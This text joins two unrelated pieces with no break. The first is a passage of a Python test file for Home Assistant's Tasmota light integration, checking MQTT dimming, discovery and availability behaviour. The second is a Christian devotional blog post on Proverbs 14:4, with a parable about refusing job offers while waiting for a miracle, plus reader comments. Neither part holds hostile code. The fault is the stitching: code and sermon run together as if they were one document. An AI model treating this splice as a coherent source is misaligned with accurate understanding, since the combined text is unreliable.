8;NoDelay;Dimmer 100", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light from 0->50: Speed should be 4*2/2=4 await common.async_turn_on(hass, "light.test", brightness=128, transition=4) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 4;NoDelay;Dimmer 50", 0, False, ) mqtt_mock.async_publish.reset_mock() # Fake state update from the light async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 # Dim the light from 50->0: Speed should be 6*2/2=6 await common.async_turn_off(hass, "light.test", transition=6) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 6;NoDelay;Power1 OFF", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_relay_as_light(hass, mqtt_mock, setup_tasmota): """Test relay show up as light in light mode.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("switch.test") assert state is None state = hass.states.get("light.test") assert state is not None async def _test_split_light(hass, mqtt_mock, config, num_lights, num_switches): """Test multi-channel light split to single-channel dimmers.""" mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") await hass.async_block_till_done() await hass.async_block_till_done() assert len(hass.states.async_entity_ids("switch")) == num_switches assert len(hass.states.async_entity_ids("light")) == num_lights lights = 
hass.states.async_entity_ids("light") for idx, entity in enumerate(lights): mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, entity) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light and verify MQTT message is sent await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Channel{idx+num_switches+1} {(idx+1)*10}", 0, False, ) async def test_split_light(hass, mqtt_mock, setup_tasmota): """Test multi-channel light split to single-channel dimmers.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["rl"][1] = 2 config["rl"][2] = 2 config["rl"][3] = 2 config["rl"][4] = 2 config["so"][68] = 1 # Multi-channel PWM instead of a single light config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_split_light(hass, mqtt_mock, config, 5, 0) async def test_split_light2(hass, mqtt_mock, setup_tasmota): """Test multi-channel light split to single-channel dimmers.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["rl"][1] = 1 config["rl"][2] = 2 config["rl"][3] = 2 config["rl"][4] = 2 config["rl"][5] = 2 config["rl"][6] = 2 config["so"][68] = 1 # Multi-channel PWM instead of a single light config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_split_light(hass, mqtt_mock, config, 5, 2) async def _test_unlinked_light(hass, mqtt_mock, config, num_switches): """Test rgbww light split to rgb+ww.""" mac = config["mac"] num_lights = 2 async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") await hass.async_block_till_done() await hass.async_block_till_done() assert 
len(hass.states.async_entity_ids("switch")) == num_switches assert len(hass.states.async_entity_ids("light")) == num_lights lights = hass.states.async_entity_ids("light") for idx, entity in enumerate(lights): mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, entity) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light and verify MQTT message is sent await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Dimmer{idx+1} {(idx+1)*10}", 0, False, ) async def test_unlinked_light(hass, mqtt_mock, setup_tasmota): """Test rgbww light split to rgb+ww.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["rl"][1] = 2 config["lk"] = 0 # RGB + white channels unlinked config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_unlinked_light(hass, mqtt_mock, config, 0) async def test_unlinked_light2(hass, mqtt_mock, setup_tasmota): """Test rgbww light split to rgb+ww.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["rl"][1] = 1 config["rl"][2] = 2 config["rl"][3] = 2 config["lk"] = 0 # RGB + white channels unlinked config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_unlinked_light(hass, mqtt_mock, config, 2) async def test_discovery_update_reconfigure_light( hass, mqtt_mock, caplog, setup_tasmota ): """Test reconfigure of discovered light.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 2 config2["lt_st"] = 3 # 3 channel light (RGB) data1 = json.dumps(config) data2 = json.dumps(config2) # Simple dimmer async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data1) 
await hass.async_block_till_done() state = hass.states.get("light.test") assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION ) # Reconfigure as RGB light async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data2) await hass.async_block_till_done() state = hass.states.get("light.test") assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION ) async def test_availability_when_connection_lost( hass, mqtt_client_mock, mqtt_mock, setup_tasmota ): """Test availability after MQTT disconnection.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability_when_connection_lost( hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config ) async def test_availability(hass, mqtt_mock, setup_tasmota): """Test availability.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability(hass, mqtt_mock, light.DOMAIN, config) async def test_availability_discovery_update(hass, mqtt_mock, setup_tasmota): """Test availability discovery update.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability_discovery_update(hass, mqtt_mock, light.DOMAIN, config) async def test_availability_poll_state( hass, mqtt_client_mock, mqtt_mock, setup_tasmota ): """Test polling after MQTT connection (re)established.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) poll_topic = "tasmota_49A3BC/cmnd/STATE" await help_test_availability_poll_state( hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config, poll_topic, "" ) async def test_discovery_removal_light(hass, mqtt_mock, caplog, setup_tasmota): """Test removal of discovered light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) 
config1["rl"][0] = 2 config1["lt_st"] = 1 # 1 channel light (Dimmer) config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 0 config2["lt_st"] = 0 await help_test_discovery_removal( hass, mqtt_mock, caplog, light.DOMAIN, config1, config2 ) async def test_discovery_removal_relay_as_light(hass, mqtt_mock, caplog, setup_tasmota): """Test removal of discovered relay as light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) config1["rl"][0] = 1 config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 1 config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light await help_test_discovery_removal( hass, mqtt_mock, caplog, light.DOMAIN, config1, config2 ) async def test_discovery_removal_relay_as_light2( hass, mqtt_mock, caplog, setup_tasmota ): """Test removal of discovered relay as light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) config1["rl"][0] = 1 config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 0 config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light await help_test_discovery_removal( hass, mqtt_mock, caplog, light.DOMAIN, config1, config2 ) async def test_discovery_update_unchanged_light(hass, mqtt_mock, caplog, setup_tasmota): """Test update of discovered light.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) with patch( "homeassistant.components.tasmota.light.TasmotaLight.discovery_update" ) as discovery_update: await help_test_discovery_update_unchanged( hass, mqtt_mock, caplog, light.DOMAIN, config, discovery_update ) async def test_discovery_device_remove(hass, mqtt_mock, setup_tasmota): """Test device registry remove.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) unique_id = f"{DEFAULT_CONFIG['mac']}_light_light_0" await 
help_test_discovery_device_remove( hass, mqtt_mock, light.DOMAIN, unique_id, config ) async def test_discovery_device_remove_relay_as_light(hass, mqtt_mock, setup_tasmota): """Test device registry remove.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light unique_id = f"{DEFAULT_CONFIG['mac']}_light_relay_0" await help_test_discovery_device_remove( hass, mqtt_mock, light.DOMAIN, unique_id, config ) async def test_entity_id_update_subscriptions(hass, mqtt_mock, setup_tasmota): """Test MQTT subscriptions are managed when entity_id is updated.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) topics = [ get_topic_stat_result(config), get_topic_tele_state(config), get_topic_tele_will(config), ] await help_test_entity_id_update_subscriptions( hass, mqtt_mock, light.DOMAIN, config, topics ) async def test_entity_id_update_discovery_update(hass, mqtt_mock, setup_tasmota): """Test MQTT discovery update when entity_id is updated.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_entity_id_update_discovery_update( hass, mqtt_mock, light.DOMAIN, config )
Daily Inspiration from Proverbs 14 P.162 – Got Oxen? Daily Inspiration from These Verses – Got Oxen? This is a simple little verse, that packs a wallop of meaning. Well, at least it does in my opinion. As it says above, with no oxen, the crib is clean, but were there oxen present, the crib would be a mess. But, despite the mess, oxen are beasts of burden. This means things are happening. Work is being done, and whatever mess they leave behind is peanuts compared to the work they’ve accomplished. This verse is leading us to believe, that it is better to have an ox, than to be without one. Now, I know I don’t have any ox to put to work for me. And if I did, I’m not sure what I’d have him do. Because, due to public transportation regulations, getting it to the office to program parts using computer aided design software would prove difficult. Not a lot of rights if you’re an ox around here. Alright, I’m being a bit silly, but I think you know what I’m saying. We don’t need an ox or a farm, in order to relate to the verse above. I’d like to set aside the example that is being used, and use another one, that we all might be able to relate to a little easier. There was a man who was without a job, with a rather large overdue car payment that was scheduled to have action taken upon a couple of months out. Every day, he would pray to the Lord, for a miracle, that the money would come in somehow. One day, the phone rings, and it happens to be someone from a company who, having read his resume online, wanted to grant him an interview. But the man, being a devout Christian, stood by faith, and said, “Thank you sir, but I’m believing God to supply all my needs through his riches and glory.” Then hung up the phone. Next day comes, the phone rings again. It’s someone from a different company, looking to hire this gentleman. He again stands in faith, and repeats what he told the first person.
Day after day, week after week, he remained steadfast in prayer, and received calls for work constantly, but would not take a job, due to his faith in the Lord, that his miracle was coming. Now, what’s due is a week away, and he’s praying harder than ever, even in tears at times. As the due date creeps closer, the daily phone calls cease. The date comes and passes, and he remains steadfast in prayer, now for fear of what’s coming his way due to missing the due date. Then one day, he wakes up to the sound of a tow truck, driving out of his yard with his vehicle in tow. Then after months of prayer, this same man reckoned that it just wasn’t God’s will for him to have kept the car. What is wrong with the picture that I painted for you above? The crib was empty, and despite every attempt by the Father, to help this guy out, the man never gave it a thought. The reason (and I think we all do this from time to time) would be, because he assumed that the Lord was just going to do things the way the man wanted him to, rather than the way he willed to do it. It was the Lord’s intervention, causing employers to suddenly look favorably upon his resume online, and to call and try to hire him. That’s how the Lord willed for him to have the money. But because that’s not what the guy wanted, or was expecting, he left himself on the hook, wondering why God didn’t answer all of his prayers. Nobody wants to clean a dirty stall, right? Some people expect things to be handed to them, without having to get the stall dirty. Sure, God at times, should he will to do so, will do something miraculous to answer prayer. But never suppose that it is his will to take the easy route for anything. As a former production worker, I can tell you with certainty, that production is a messy thing, and at the end of the day, the place will need a cleaning. Rarely, if ever, does the Lord do something how and when we think he should. Particularly as it relates to gain.
Who wouldn’t want the Father to dump cash in their laps miraculously? What a surprise and a blessing that would be, particularly if it’s needed! But if that’s what you’re waiting for, don’t be disappointed when it doesn’t happen the way you had hoped, and come to find that there are many things that you’ll need to do, to get that increase. It’s not his problem that he doesn’t do things as or when we think he should. It’s our problem, thinking that God Almighty, Creator of all that there ever is or was, needs our advice as to how to do things. It is we who need to adhere to his ways, not the other way around. Even if you need to keep cleaning the stall, there’s more progress being made than there would be staring into an empty one. 9 For it is written in the law of Moses, thou shalt not muzzle the mouth of the ox that treadeth out the corn. Doth God take care for oxen? 10 Or saith he it altogether for our sake? For our sake, no doubt, this is written: that he that ploweth should plow in hope; and that he that thresheth in hope should be partaker of his hope. So often we ask things of you, and it could be, that we’re in error in how we’re expecting to receive from you. Where there are things we need to do, give us clear instructions and lead us into the place where you have designed for us to be. Please Father, let us not shy away from, or think differently than, the way you want us to do things. Bless us all to be a blessing Father, and teach us what you would have us do through your Holy Ghost, and through your Word. In the name of the Lord Jesus Christ. Have you ever noticed that more often than not, when you prayed for grain, instead you got oxen? Thanks Brian…yes, the Lord does provide for us, quite often as you pointed out. The Lord can open doors for a new job, a better location than previous ones, at a higher pay rate etc. All of these examples are the Lord’s way of providing for us to have a better life, if we let Him work.
By the way, living in a large rice growing valley, the oxen are used here to prepare the soil for the planting of the rice, which is going on right now (the start of the wet season). The Lord’s peace to you…Amen. Thanks for your comment and your kind words. It seems to me that you’ve got a great example of Proverbs 14:4 being fulfilled right around your home! God bless you Brother, and stay safe out there! May the Lord bless you everywhere you go in Jesus’ name!